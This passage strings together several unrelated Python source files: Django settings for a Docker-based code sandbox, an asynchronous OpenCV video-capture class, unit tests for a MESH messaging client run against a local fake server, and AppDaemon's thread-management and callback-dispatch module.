'include_html': True,
'formatter': 'verbose'
}
},
'loggers': {
'sandbox': {
'handlers': ['console', 'syslog', 'mail_admins', 'syslog_debug'],
'level': 'DEBUG',
'propagate': True,
},
'django': {
'handlers': ['console', 'syslog', 'mail_admins', 'syslog_debug'],
'level': 'INFO',
},
'django.request': {
'handlers': ['console', 'syslog', 'syslog_debug'],
'level': 'WARNING',
'propagate': False,
}
},
}
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
# External libraries will be added to containers in /utils/libs/; this directory will be
# added to both the PATH and PYTHONPATH environment variables.
# Each external lib must be a tuple (GIT_URL, ALIAS), where GIT_URL is the URL 'git clone'
# will use, ALIAS the directory in which the library will be cloned.
EXTERNAL_LIBRARIES = [
("https://github.com/PremierLangage/premierlangage-lib.git", "pl"),
]
# Path where the libraries are downloaded
EXTERNAL_LIBRARIES_ROOT = os.path.join(BASE_DIR, 'libs')
if not os.path.isdir(EXTERNAL_LIBRARIES_ROOT):
os.makedirs(EXTERNAL_LIBRARIES_ROOT)
# The CronTrigger triggering the update of the external libraries, see
# https://apscheduler.readthedocs.io/en/latest/modules/triggers/cron.html for more information.
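# The trigger below fires at minute 0 of every second hour (i.e. every two hours).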
EXTERNAL_LIBRARIES_CRON_TRIGGER = CronTrigger(
year="*",
month="*",
day="*",
week="*",
day_of_week="*",
hour="*/2",
minute="0",
second="0",
)
SANDBOX_VERSION = "3.0.3"
# Time before returning a '503: Service Unavailable' when waiting for a container.
WAIT_FOR_CONTAINER_DURATION = 2
# Total time for an '/execute/' request before timeout
EXECUTE_TIMEOUT = 10.0
# Directory where environments are stored
ENVIRONMENT_ROOT = os.path.join(BASE_DIR, 'environments')
if not os.path.isdir(ENVIRONMENT_ROOT):
os.makedirs(ENVIRONMENT_ROOT)
# ENVIRONMENT_EXPIRATION: Time before environments are deleted.
HOUR = 3600
DAY = HOUR * 24
ENVIRONMENT_EXPIRATION = DAY
#
# DOCKER_COUNT (int) – Max number of containers running simultaneously.
# DOCKER_VOLUME_MEM_LIMIT (int) – Limit of memory usage for volumes (in MB).
# DOCKER_VOLUME_HOST_BASEDIR (str) – Path to the root directory containing each directory shared
# with the containers. For each container, a directory named after the container's name is
# created inside DOCKER_VOLUME_HOST_BASEDIR.
#
# DOCKER_PARAMETERS (dict) - kwargs given to the Containers constructor. See
# https://docker-py.readthedocs.io/en/stable/containers.html and
# https://docs.docker.com/config/containers/resource_constraints/ for more information about
# every argument
DOCKER_COUNT = 20
DOCKER_VOLUME_HOST_BASEDIR = os.path.join(BASE_DIR, 'containers_env')
DOCKER_PARAMETERS = {
"image": "pl:latest",
"auto_remove": True,
"cpu_period": 1000,
"cpu_shares": 1024,
"cpu_quota": 0,
"cpuset_cpus": "0",
"detach": True,
"environment": {},
"mem_limit": "100m",
"memswap_limit": "200m",
"network_mode": "none",
"network_disabled": True,
# "storage_opt": {},
"tty": True,
"ulimits": [
Ulimit(name="core", soft=0, hard=0)
],
}
# Check if any of the above settings are overridden by a config.py file.
logger = logging.getLogger(__name__)
try:
from config import * # noqa
logger.info("Using config.py...")
except ModuleNotFoundError:
logger.info("No config file found")
del logger
# Override some settings for testing purposes
if TESTING:
DOCKER_COUNT = 5
from sandbox.containers import initialise_containers # noqa
INITIALISING_THREAD = threading.Thread(target=initialise_containers)
INITIALISING_THREAD.start()
|
videocaptureasync.py
|
# file: videocaptureasync.py
import threading
import cv2
class VideoCaptureAsync:
def __init__(self, src=0, width=640, height=480):
self.src = src
self.cap = cv2.VideoCapture(self.src)
self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
self.grabbed, self.frame = self.cap.read()
self.started = False
self.read_lock = threading.Lock()
def set(self, var1, var2):
self.cap.set(var1, var2)
def start(self):
if self.started:
            print('[!] Asynchronous video capturing has already been started.')
return None
self.started = True
self.thread = threading.Thread(target=self.update, args=())
self.thread.start()
return self
def update(self):
while self.started:
grabbed, frame = self.cap.read()
with self.read_lock:
self.grabbed = grabbed
self.frame = frame
def read(self):
with self.read_lock:
frame = self.frame.copy()
grabbed = self.grabbed
return grabbed, frame
def stop(self):
self.started = False
self.thread.join()
def __exit__(self, exec_type, exc_value, traceback):
self.cap.release()
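# --- Usage sketch (illustrative addition, not part of the original module). ---
# Grabs frames from the default camera via the background capture thread. It assumes
# a working camera at index 0; since the class defines __exit__ but no __enter__,
# the capture device is released explicitly here.
if __name__ == "__main__":
    cap = VideoCaptureAsync(src=0).start()
    for _ in range(100):
        grabbed, frame = cap.read()  # latest frame grabbed by the background thread
    cap.stop()
    cap.__exit__(None, None, None)  # releases the underlying cv2.VideoCapture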
|
mesh_client_test.py
|
from __future__ import absolute_import, print_function
from unittest import TestCase, main
import random
import signal
import sys
import threading
import traceback
from mesh_client import MeshClient, MeshError, default_ssl_opts
from fake_mesh.server import make_server
def print_stack_frames(signum=None, frame=None):
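    # Dump the Python stack of every live thread; useful for diagnosing hangs by
    # sending SIGUSR1 to the test process (see the signal.signal call below).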
for frame in sys._current_frames().values():
traceback.print_stack(frame)
print()
signal.signal(signal.SIGUSR1, print_stack_frames)
class TestError(Exception):
pass
class MeshClientTest(TestCase):
uri = 'https://localhost:8829'
@classmethod
def setUpClass(cls):
cls.server = make_server(host='127.0.0.1', port=8829, logging=True)
cls.server_thread = threading.Thread(target=cls.server.start)
cls.server_thread.start()
@classmethod
def tearDownClass(cls):
cls.server.stop()
cls.server_thread.join()
def setUp(self):
self.alice_mailbox = str(random.randint(0, 1000000000000))
self.bob_mailbox = str(random.randint(0, 1000000000000))
self.alice = MeshClient(
self.uri,
self.alice_mailbox,
'password',
max_chunk_size=5,
**default_ssl_opts)
self.bob = MeshClient(
self.uri,
self.bob_mailbox,
'password',
max_chunk_size=5,
**default_ssl_opts)
def test_handshake(self):
alice = self.alice
hand_shook = alice.handshake()
self.assertEqual(hand_shook, b"hello")
def test_send_receive(self):
alice = self.alice
bob = self.bob
message_id = alice.send_message(self.bob_mailbox, b"Hello Bob 1")
self.assertEqual([message_id], bob.list_messages())
msg = bob.retrieve_message(message_id)
self.assertEqual(msg.read(), b"Hello Bob 1")
self.assertEqual(msg.sender, self.alice_mailbox)
self.assertEqual(msg.recipient, self.bob_mailbox)
self.assertEqual(msg.filename, message_id + '.dat')
msg.acknowledge()
self.assertEqual([], bob.list_messages())
def test_optional_args(self):
alice = self.alice
bob = self.bob
message_id = alice.send_message(
self.bob_mailbox,
b"Hello Bob 5",
subject="Hello World",
filename="upload.txt",
local_id="12345",
message_type="DATA",
process_id="321",
workflow_id="111",
encrypted=False,
compressed=False)
with bob.retrieve_message(message_id) as msg:
self.assertEqual(msg.subject, "Hello World")
self.assertEqual(msg.filename, "upload.txt")
self.assertEqual(msg.local_id, "12345")
self.assertEqual(msg.message_type, "DATA")
self.assertEqual(msg.process_id, "321")
self.assertEqual(msg.workflow_id, "111")
self.assertFalse(msg.encrypted)
self.assertFalse(msg.compressed)
message_id = alice.send_message(
self.bob_mailbox, b"Hello Bob 5", encrypted=True, compressed=True)
with bob.retrieve_message(message_id) as msg:
self.assertTrue(msg.encrypted)
self.assertTrue(msg.compressed)
def test_endpoint_lookup(self):
result = self.alice.lookup_endpoint('ORG1', 'WF1')
result_list = result['results']
self.assertEqual(len(result_list), 1)
self.assertEqual(result_list[0]['address'], 'ORG1HC001')
self.assertEqual(result_list[0]['description'], 'ORG1 WF1 endpoint')
self.assertEqual(result_list[0]['endpoint_type'], 'MESH')
def test_tracking(self):
alice = self.alice
bob = self.bob
tracking_id = 'Message1'
msg_id = alice.send_message(self.bob_mailbox, b'Hello World', local_id=tracking_id)
self.assertEqual(alice.get_tracking_info(message_id=msg_id)['status'], 'Accepted')
self.assertIsNone(alice.get_tracking_info(message_id=msg_id)['downloadTimestamp'])
bob.retrieve_message(msg_id).read()
self.assertIsNotNone(alice.get_tracking_info(message_id=msg_id)['downloadTimestamp'])
bob.acknowledge_message(msg_id)
self.assertEqual(alice.get_tracking_info(message_id=msg_id)['status'], 'Acknowledged')
def test_msg_id_tracking(self):
alice = self.alice
bob = self.bob
msg_id = alice.send_message(self.bob_mailbox, b'Hello World')
self.assertEqual(alice.get_tracking_info(message_id=msg_id)['status'], 'Accepted')
self.assertIsNone(alice.get_tracking_info(message_id=msg_id)['downloadTimestamp'])
bob.retrieve_message(msg_id).read()
self.assertIsNotNone(alice.get_tracking_info(message_id=msg_id)['downloadTimestamp'])
bob.acknowledge_message(msg_id)
self.assertEqual(alice.get_tracking_info(message_id=msg_id)['status'], 'Acknowledged')
if __name__ == "__main__":
main()
|
threading.py
|
import asyncio
import threading
import datetime
from queue import Queue
from random import randint
import re
import sys
import traceback
import inspect
from datetime import timedelta
import logging
import iso8601
from appdaemon import utils as utils
from appdaemon.appdaemon import AppDaemon
class Threading:
def __init__(self, ad: AppDaemon, kwargs):
self.AD = ad
self.kwargs = kwargs
self.logger = ad.logging.get_child("_threading")
self.diag = ad.logging.get_diag()
self.thread_count = 0
self.threads = {}
# A few shortcuts
self.add_entity = ad.state.add_entity
self.get_state = ad.state.get_state
self.set_state = ad.state.set_state
self.add_to_state = ad.state.add_to_state
self.add_to_attr = ad.state.add_to_attr
self.auto_pin = True
self.pin_threads = 0
self.total_threads = 0
self.pin_apps = None
self.next_thread = None
# Setup stats
self.current_callbacks_executed = 0
self.current_callbacks_fired = 0
self.last_stats_time = datetime.datetime(1970, 1, 1, 0, 0, 0, 0)
self.callback_list = []
async def get_q_update(self):
for thread in self.threads:
qsize = self.get_q(thread).qsize()
await self.set_state("_threading", "admin", "thread.{}".format(thread), q=qsize)
async def get_callback_update(self):
now = datetime.datetime.now()
self.callback_list.append(
{"fired": self.current_callbacks_fired, "executed": self.current_callbacks_executed, "ts": now}
)
if len(self.callback_list) > 10:
self.callback_list.pop(0)
fired_sum = 0
executed_sum = 0
for item in self.callback_list:
fired_sum += item["fired"]
executed_sum += item["executed"]
total_duration = (
self.callback_list[len(self.callback_list) - 1]["ts"] - self.callback_list[0]["ts"]
).total_seconds()
if total_duration == 0:
fired_avg = 0
executed_avg = 0
else:
fired_avg = round(fired_sum / total_duration, 1)
executed_avg = round(executed_sum / total_duration, 1)
await self.set_state("_threading", "admin", "sensor.callbacks_average_fired", state=fired_avg)
await self.set_state(
"_threading", "admin", "sensor.callbacks_average_executed", state=executed_avg,
)
self.last_stats_time = now
self.current_callbacks_executed = 0
self.current_callbacks_fired = 0
async def init_admin_stats(self):
# Initialize admin stats
await self.add_entity("admin", "sensor.callbacks_total_fired", 0)
await self.add_entity("admin", "sensor.callbacks_average_fired", 0)
await self.add_entity("admin", "sensor.callbacks_total_executed", 0)
await self.add_entity("admin", "sensor.callbacks_average_executed", 0)
await self.add_entity("admin", "sensor.threads_current_busy", 0)
await self.add_entity("admin", "sensor.threads_max_busy", 0)
await self.add_entity(
"admin", "sensor.threads_max_busy_time", utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)),
)
await self.add_entity(
"admin", "sensor.threads_last_action_time", utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)),
)
async def create_initial_threads(self):
kwargs = self.kwargs
if "threads" in kwargs:
            self.logger.warning(
                "The 'threads' directive is deprecated; apps will be pinned. "
                "Use total_threads if you want to unpin your apps"
            )
if "total_threads" in kwargs:
self.total_threads = kwargs["total_threads"]
self.auto_pin = False
else:
apps = await self.AD.app_management.check_config(True, False)
self.total_threads = int(apps["active"])
self.pin_apps = True
utils.process_arg(self, "pin_apps", kwargs)
if self.pin_apps is True:
self.pin_threads = self.total_threads
else:
self.auto_pin = False
self.pin_threads = 0
if "total_threads" not in kwargs:
self.total_threads = 10
utils.process_arg(self, "pin_threads", kwargs, int=True)
if self.pin_threads > self.total_threads:
raise ValueError("pin_threads cannot be > total_threads")
if self.pin_threads < 0:
raise ValueError("pin_threads cannot be < 0")
self.logger.info(
"Starting Apps with %s workers and %s pins", self.total_threads, self.pin_threads,
)
self.next_thread = self.pin_threads
self.thread_count = 0
for i in range(self.total_threads):
await self.add_thread(True)
# Add thread object to track async
await self.add_entity(
"admin",
"thread.async",
"idle",
{
"q": 0,
"is_alive": True,
"time_called": utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)),
"pinned_apps": [],
},
)
def get_q(self, thread_id):
return self.threads[thread_id]["queue"]
@staticmethod
def atoi(text):
return int(text) if text.isdigit() else text
def natural_keys(self, text):
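        # Split e.g. "thread-10" into ["thread-", 10, ""] so thread names sort
        # numerically instead of lexically.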
return [self.atoi(c) for c in re.split(r"(\d+)", text)]
# Diagnostics
def total_q_size(self):
qsize = 0
for thread in self.threads:
qsize += self.threads[thread]["queue"].qsize()
return qsize
def min_q_id(self):
id = 0
i = 0
qsize = sys.maxsize
for thread in self.threads:
if self.threads[thread]["queue"].qsize() < qsize:
qsize = self.threads[thread]["queue"].qsize()
id = i
i += 1
return id
async def get_thread_info(self):
info = {}
info["max_busy_time"] = await self.get_state("_threading", "admin", "sensor.threads_max_busy_time")
info["last_action_time"] = await self.get_state("_threading", "admin", "sensor.threads_last_action_time")
info["current_busy"] = await self.get_state("_threading", "admin", "sensor.threads_current_busy")
info["max_busy"] = await self.get_state("_threading", "admin", "sensor.threads_max_busy")
info["threads"] = {}
for thread in sorted(self.threads, key=self.natural_keys):
if thread not in info["threads"]:
info["threads"][thread] = {}
t = await self.get_state("_threading", "admin", "thread.{}".format(thread), attribute="all")
info["threads"][thread]["time_called"] = t["attributes"]["time_called"]
info["threads"][thread]["callback"] = t["state"]
info["threads"][thread]["is_alive"] = t["attributes"]["is_alive"]
return info
async def dump_threads(self):
self.diag.info("--------------------------------------------------")
self.diag.info("Threads")
self.diag.info("--------------------------------------------------")
current_busy = await self.get_state("_threading", "admin", "sensor.threads_current_busy")
max_busy = await self.get_state("_threading", "admin", "sensor.threads_max_busy")
max_busy_time = utils.str_to_dt(await self.get_state("_threading", "admin", "sensor.threads_max_busy_time"))
last_action_time = await self.get_state("_threading", "admin", "sensor.threads_last_action_time")
self.diag.info("Currently busy threads: %s", current_busy)
self.diag.info("Most used threads: %s at %s", max_busy, max_busy_time)
self.diag.info("Last activity: %s", last_action_time)
self.diag.info("Total Q Entries: %s", self.total_q_size())
self.diag.info("--------------------------------------------------")
for thread in sorted(self.threads, key=self.natural_keys):
t = await self.get_state("_threading", "admin", "thread.{}".format(thread), attribute="all")
print("thread.{}".format(thread), t)
self.diag.info(
"%s - qsize: %s | current callback: %s | since %s, | alive: %s, | pinned apps: %s",
thread,
t["attributes"]["q"],
t["state"],
t["attributes"]["time_called"],
t["attributes"]["is_alive"],
await self.get_pinned_apps(thread),
)
self.diag.info("--------------------------------------------------")
#
# Thread Management
#
def select_q(self, args):
#
# Select Q based on distribution method:
# Round Robin
# Random
# Load distribution
#
# Check for pinned app and if so figure correct thread for app
if args["pin_app"] is True:
thread = args["pin_thread"]
# Handle the case where an App is unpinned but selects a pinned callback without specifying a thread
# If this happens a lot, thread 0 might get congested but the alternatives are worse!
if thread == -1:
self.logger.warning(
"Invalid thread ID for pinned thread in app: %s - assigning to thread 0", args["name"],
)
thread = 0
else:
if self.thread_count == self.pin_threads:
raise ValueError("pin_threads must be set lower than threads if unpinned_apps are in use")
if self.AD.load_distribution == "load":
thread = self.min_q_id()
elif self.AD.load_distribution == "random":
thread = randint(self.pin_threads, self.thread_count - 1)
else:
# Round Robin is the catch all
thread = self.next_thread
self.next_thread += 1
if self.next_thread == self.thread_count:
self.next_thread = self.pin_threads
if thread < 0 or thread >= self.thread_count:
raise ValueError("invalid thread id: {} in app {}".format(thread, args["name"]))
id = "thread-{}".format(thread)
q = self.threads[id]["queue"]
q.put_nowait(args)
async def check_overdue_and_dead_threads(self):
if self.AD.sched.realtime is True and self.AD.thread_duration_warning_threshold != 0:
for thread_id in self.threads:
if self.threads[thread_id]["thread"].is_alive() is not True:
self.logger.critical("Thread %s has died", thread_id)
self.logger.critical("Pinned apps were: %s", await self.get_pinned_apps(thread_id))
self.logger.critical("Thread will be restarted")
id = thread_id.split("-")[1]
await self.add_thread(silent=False, pinthread=False, id=id)
if await self.get_state("_threading", "admin", "thread.{}".format(thread_id)) != "idle":
start = utils.str_to_dt(
await self.get_state(
"_threading", "admin", "thread.{}".format(thread_id), attribute="time_called",
)
)
dur = (await self.AD.sched.get_now() - start).total_seconds()
if (
dur >= self.AD.thread_duration_warning_threshold
and dur % self.AD.thread_duration_warning_threshold == 0
):
self.logger.warning(
"Excessive time spent in callback: %s - %s",
await self.get_state(
"_threading", "admin", "thread.{}".format(thread_id), attribute="callback",
),
dur,
)
async def check_q_size(self, warning_step, warning_iterations):
totalqsize = 0
for thread in self.threads:
totalqsize += self.threads[thread]["queue"].qsize()
if totalqsize > self.AD.qsize_warning_threshold:
if (
warning_step == 0 and warning_iterations >= self.AD.qsize_warning_iterations
) or warning_iterations == self.AD.qsize_warning_iterations:
for thread in self.threads:
qsize = self.threads[thread]["queue"].qsize()
if qsize > 0:
self.logger.warning(
"Queue size for thread %s is %s, callback is '%s' called at %s - possible thread starvation",
thread,
qsize,
await self.get_state("_threading", "admin", "thread.{}".format(thread)),
iso8601.parse_date(
await self.get_state(
"_threading", "admin", "thread.{}".format(thread), attribute="time_called",
)
),
)
await self.dump_threads()
warning_step = 0
warning_step += 1
warning_iterations += 1
if warning_step >= self.AD.qsize_warning_step:
warning_step = 0
else:
warning_step = 0
warning_iterations = 0
return warning_step, warning_iterations
async def update_thread_info(self, thread_id, callback, app, type, uuid):
self.logger.debug("Update thread info: %s", thread_id)
if self.AD.log_thread_actions:
if callback == "idle":
self.diag.info("%s done", thread_id)
else:
self.diag.info("%s calling %s callback %s", thread_id, type, callback)
now = await self.AD.sched.get_now()
if callback == "idle":
start = utils.str_to_dt(
await self.get_state("_threading", "admin", "thread.{}".format(thread_id), attribute="time_called",)
)
if (
self.AD.sched.realtime is True
and (now - start).total_seconds() >= self.AD.thread_duration_warning_threshold
):
self.logger.warning(
"callback %s has now completed",
await self.get_state("_threading", "admin", "thread.{}".format(thread_id)),
)
await self.add_to_state("_threading", "admin", "sensor.threads_current_busy", -1)
await self.add_to_attr("_threading", "admin", "app.{}".format(app), "callbacks", 1)
await self.add_to_attr(
"_threading", "admin", "{}_callback.{}".format(type, uuid), "executed", 1,
)
await self.add_to_state("_threading", "admin", "sensor.callbacks_total_executed", 1)
self.current_callbacks_executed += 1
else:
await self.add_to_state("_threading", "admin", "sensor.threads_current_busy", 1)
self.current_callbacks_fired += 1
current_busy = await self.get_state("_threading", "admin", "sensor.threads_current_busy")
max_busy = await self.get_state("_threading", "admin", "sensor.threads_max_busy")
if current_busy > max_busy:
await self.set_state("_threading", "admin", "sensor.threads_max_busy", state=current_busy)
await self.set_state(
"_threading",
"admin",
"sensor.threads_max_busy_time",
state=utils.dt_to_str((await self.AD.sched.get_now()).replace(microsecond=0), self.AD.tz),
)
await self.set_state(
"_threading",
"admin",
"sensor.threads_last_action_time",
state=utils.dt_to_str((await self.AD.sched.get_now()).replace(microsecond=0), self.AD.tz),
)
# Update thread info
if thread_id == "async":
await self.set_state(
"_threading",
"admin",
"thread.{}".format(thread_id),
q=0,
state=callback,
time_called=utils.dt_to_str(now.replace(microsecond=0), self.AD.tz),
is_alive=True,
pinned_apps=[],
)
else:
await self.set_state(
"_threading",
"admin",
"thread.{}".format(thread_id),
q=self.threads[thread_id]["queue"].qsize(),
state=callback,
time_called=utils.dt_to_str(now.replace(microsecond=0), self.AD.tz),
is_alive=self.threads[thread_id]["thread"].is_alive(),
pinned_apps=await self.get_pinned_apps(thread_id),
)
await self.set_state("_threading", "admin", "app.{}".format(app), state=callback)
#
# Pinning
#
async def add_thread(self, silent=False, pinthread=False, id=None):
if id is None:
tid = self.thread_count
else:
tid = id
if silent is False:
self.logger.info("Adding thread %s", tid)
t = threading.Thread(target=self.worker)
t.daemon = True
name = "thread-{}".format(tid)
t.setName(name)
if id is None:
await self.add_entity(
"admin",
"thread.{}".format(name),
"idle",
{"q": 0, "is_alive": True, "time_called": utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0))},
)
self.threads[name] = {}
self.threads[name]["queue"] = Queue(maxsize=0)
t.start()
self.thread_count += 1
if pinthread is True:
self.pin_threads += 1
else:
await self.set_state(
"_threading", "admin", "thread.{}".format(name), state="idle", is_alive=True,
)
self.threads[name]["thread"] = t
async def calculate_pin_threads(self):
if self.pin_threads == 0:
return
thread_pins = [0] * self.pin_threads
for name in self.AD.app_management.objects:
# Looking for apps that already have a thread pin value
if await self.get_app_pin(name) and await self.get_pin_thread(name) != -1:
thread = await self.get_pin_thread(name)
if thread >= self.thread_count:
raise ValueError(
"Pinned thread out of range - check apps.yaml for 'pin_thread' or app code for 'set_pin_thread()'"
)
# Ignore anything outside the pin range as it will have been set by the user
if thread < self.pin_threads:
thread_pins[thread] += 1
# Now we know the numbers, go fill in the gaps
for name in self.AD.app_management.objects:
if await self.get_app_pin(name) and await self.get_pin_thread(name) == -1:
thread = thread_pins.index(min(thread_pins))
await self.set_pin_thread(name, thread)
thread_pins[thread] += 1
for thread in self.threads:
pinned_apps = await self.get_pinned_apps(thread)
await self.set_state(
"_threading", "admin", "thread.{}".format(thread), pinned_apps=pinned_apps,
)
def app_should_be_pinned(self, name):
# Check apps.yaml first - allow override
app = self.AD.app_management.app_config[name]
if "pin_app" in app:
return app["pin_app"]
# if not, go with the global default
return self.pin_apps
async def get_app_pin(self, name):
return self.AD.app_management.objects[name]["pin_app"]
async def set_app_pin(self, name, pin):
self.AD.app_management.objects[name]["pin_app"] = pin
if pin is True:
# May need to set this app up with a pinned thread
await self.calculate_pin_threads()
async def get_pin_thread(self, name):
return self.AD.app_management.objects[name]["pin_thread"]
async def set_pin_thread(self, name, thread):
self.AD.app_management.objects[name]["pin_thread"] = thread
def validate_pin(self, name, kwargs):
valid = True
if "pin_thread" in kwargs:
if kwargs["pin_thread"] < 0 or kwargs["pin_thread"] >= self.thread_count:
self.logger.warning(
"Invalid value for pin_thread (%s) in app: %s - discarding callback", kwargs["pin_thread"], name,
)
valid = False
return valid
async def get_pinned_apps(self, thread):
id = int(thread.split("-")[1])
apps = []
for obj in self.AD.app_management.objects:
if self.AD.app_management.objects[obj]["pin_thread"] == id:
apps.append(obj)
return apps
#
# Constraints
#
async def check_constraint(self, key, value, app):
unconstrained = True
if key in app.list_constraints():
method = getattr(app, key)
unconstrained = await utils.run_in_executor(self, method, value)
return unconstrained
async def check_time_constraint(self, args, name):
unconstrained = True
if "constrain_start_time" in args or "constrain_end_time" in args:
if "constrain_start_time" not in args:
start_time = "00:00:00"
else:
start_time = args["constrain_start_time"]
if "constrain_end_time" not in args:
end_time = "23:59:59"
else:
end_time = args["constrain_end_time"]
if await self.AD.sched.now_is_between(start_time, end_time, name) is False:
unconstrained = False
return unconstrained
async def check_days_constraint(self, args, name):
unconstrained = True
if "constrain_days" in args:
days = args["constrain_days"]
now = await self.AD.sched.get_now()
daylist = []
for day in days.split(","):
daylist.append(await utils.run_in_executor(self, utils.day_of_week, day))
if now.weekday() not in daylist:
unconstrained = False
return unconstrained
#
# Workers
#
async def check_and_dispatch_state(
self, name, funcref, entity, attribute, new_state, old_state, cold, cnew, kwargs, uuid_, pin_app, pin_thread,
):
executed = False
# kwargs["handle"] = uuid_
#
#
#
if attribute == "all":
executed = await self.dispatch_worker(
name,
{
"id": uuid_,
"name": name,
"objectid": self.AD.app_management.objects[name]["id"],
"type": "state",
"function": funcref,
"attribute": attribute,
"entity": entity,
"new_state": new_state,
"old_state": old_state,
"pin_app": pin_app,
"pin_thread": pin_thread,
"kwargs": kwargs,
},
)
else:
#
# Let's figure out if we need to run a callback
#
# Start by figuring out what the incoming old value was
#
if old_state is None:
old = None
else:
if attribute in old_state:
old = old_state[attribute]
elif "attributes" in old_state and attribute in old_state["attributes"]:
old = old_state["attributes"][attribute]
else:
old = None
#
# Now the incoming new value
#
if new_state is None:
new = None
else:
if attribute in new_state:
new = new_state[attribute]
elif "attributes" in new_state and attribute in new_state["attributes"]:
new = new_state["attributes"][attribute]
else:
new = None
#
# Don't do anything unless there has been a change
#
if new != old:
if "__duration" in kwargs:
#
# We have a pending timer for this, but we are coming around again.
# Either we will start a new timer if the conditions are met
# Or we won't if they are not.
# Either way, we cancel the old timer
#
await self.AD.sched.cancel_timer(name, kwargs["__duration"])
#
# Check if we care about the change
#
if (cold is None or cold == old) and (cnew is None or cnew == new):
#
# We do!
#
if "duration" in kwargs:
#
# Set a timer
#
exec_time = await self.AD.sched.get_now() + timedelta(seconds=int(kwargs["duration"]))
#
# If it's a oneshot, the scheduler will delete the callback once it has executed,
# so we need to give it the handle so it knows what to delete
#
if kwargs.get("oneshot", False):
kwargs["__handle"] = uuid_
#
# We're not executing the callback immediately so let's schedule it
# Unless we intercede and cancel it, the callback will happen in "duration" seconds
#
kwargs["__duration"] = await self.AD.sched.insert_schedule(
name,
exec_time,
funcref,
False,
None,
__entity=entity,
__attribute=attribute,
__old_state=old,
__new_state=new,
**kwargs
)
else:
#
# Not a delay so make the callback immediately
#
executed = await self.dispatch_worker(
name,
{
"id": uuid_,
"name": name,
"objectid": self.AD.app_management.objects[name]["id"],
"type": "state",
"function": funcref,
"attribute": attribute,
"entity": entity,
"new_state": new,
"old_state": old,
"pin_app": pin_app,
"pin_thread": pin_thread,
"kwargs": kwargs,
},
)
return executed
async def dispatch_worker(self, name, args):
unconstrained = True
#
# Argument Constraints
#
for arg in self.AD.app_management.app_config[name].keys():
constrained = await self.check_constraint(
arg, self.AD.app_management.app_config[name][arg], self.AD.app_management.objects[name]["object"],
)
if not constrained:
unconstrained = False
if not await self.check_time_constraint(self.AD.app_management.app_config[name], name):
unconstrained = False
elif not await self.check_days_constraint(self.AD.app_management.app_config[name], name):
unconstrained = False
#
# Callback level constraints
#
myargs = utils.deepcopy(args)
if "kwargs" in myargs:
for arg in myargs["kwargs"].keys():
constrained = await self.check_constraint(
arg, myargs["kwargs"][arg], self.AD.app_management.objects[name]["object"],
)
if not constrained:
unconstrained = False
if not await self.check_time_constraint(myargs["kwargs"], name):
unconstrained = False
elif not await self.check_days_constraint(myargs["kwargs"], name):
unconstrained = False
if unconstrained:
#
# It's going to happen
#
await self.add_to_state("_threading", "admin", "sensor.callbacks_total_fired", 1)
await self.add_to_attr(
"_threading", "admin", "{}_callback.{}".format(myargs["type"], myargs["id"]), "fired", 1,
)
#
# And Q
#
if asyncio.iscoroutinefunction(myargs["function"]):
f = asyncio.ensure_future(self.async_worker(myargs))
self.AD.futures.add_future(name, f)
else:
self.select_q(myargs)
return True
else:
return False
# noinspection PyBroadException
async def async_worker(self, args):
thread_id = threading.current_thread().name
_type = args["type"]
funcref = args["function"]
_id = args["id"]
objectid = args["objectid"]
name = args["name"]
error_logger = logging.getLogger("Error.{}".format(name))
args["kwargs"]["__thread_id"] = thread_id
callback = "{}() in {}".format(funcref.__name__, name)
app = await self.AD.app_management.get_app_instance(name, objectid)
if app is not None:
try:
if _type == "scheduler":
try:
await self.update_thread_info("async", callback, name, _type, _id)
await funcref(self.AD.sched.sanitize_timer_kwargs(app, args["kwargs"]))
except TypeError:
self.report_callback_sig(name, "scheduler", funcref, args)
elif _type == "state":
try:
entity = args["entity"]
attr = args["attribute"]
old_state = args["old_state"]
new_state = args["new_state"]
await self.update_thread_info("async", callback, name, _type, _id)
await funcref(
entity,
attr,
old_state,
new_state,
self.AD.state.sanitize_state_kwargs(app, args["kwargs"]),
)
except TypeError:
self.report_callback_sig(name, "state", funcref, args)
elif _type == "event":
data = args["data"]
if args["event"] == "__AD_LOG_EVENT":
try:
await self.update_thread_info("async", callback, name, _type, _id)
await funcref(
data["app_name"],
data["ts"],
data["level"],
data["log_type"],
data["message"],
args["kwargs"],
)
except TypeError:
self.report_callback_sig(name, "log_event", funcref, args)
else:
try:
await self.update_thread_info("async", callback, name, _type, _id)
await funcref(args["event"], data, args["kwargs"])
except TypeError:
self.report_callback_sig(name, "event", funcref, args)
except Exception:
error_logger.warning("-" * 60)
error_logger.warning("Unexpected error in worker for App %s:", name)
error_logger.warning("Worker Ags: %s", args)
error_logger.warning("-" * 60)
error_logger.warning(traceback.format_exc())
error_logger.warning("-" * 60)
if self.AD.logging.separate_error_log() is True:
self.logger.warning(
"Logged an error to %s", self.AD.logging.get_filename("error_log"),
)
finally:
pass
await self.update_thread_info("async", "idle", name, _type, _id)
else:
if not self.AD.stopping:
self.logger.warning("Found stale callback for %s - discarding", name)
# noinspection PyBroadException
def worker(self): # noqa: C901
thread_id = threading.current_thread().name
q = self.get_q(thread_id)
while True:
args = q.get()
_type = args["type"]
funcref = args["function"]
_id = args["id"]
objectid = args["objectid"]
name = args["name"]
error_logger = logging.getLogger("Error.{}".format(name))
args["kwargs"]["__thread_id"] = thread_id
callback = "{}() in {}".format(funcref.__name__, name)
app = utils.run_coroutine_threadsafe(self, self.AD.app_management.get_app_instance(name, objectid))
if app is not None:
try:
if _type == "scheduler":
try:
utils.run_coroutine_threadsafe(
self, self.update_thread_info(thread_id, callback, name, _type, _id),
)
funcref(self.AD.sched.sanitize_timer_kwargs(app, args["kwargs"]))
except TypeError:
self.report_callback_sig(name, "scheduler", funcref, args)
elif _type == "state":
try:
entity = args["entity"]
attr = args["attribute"]
old_state = args["old_state"]
new_state = args["new_state"]
utils.run_coroutine_threadsafe(
self, self.update_thread_info(thread_id, callback, name, _type, _id),
)
funcref(
entity,
attr,
old_state,
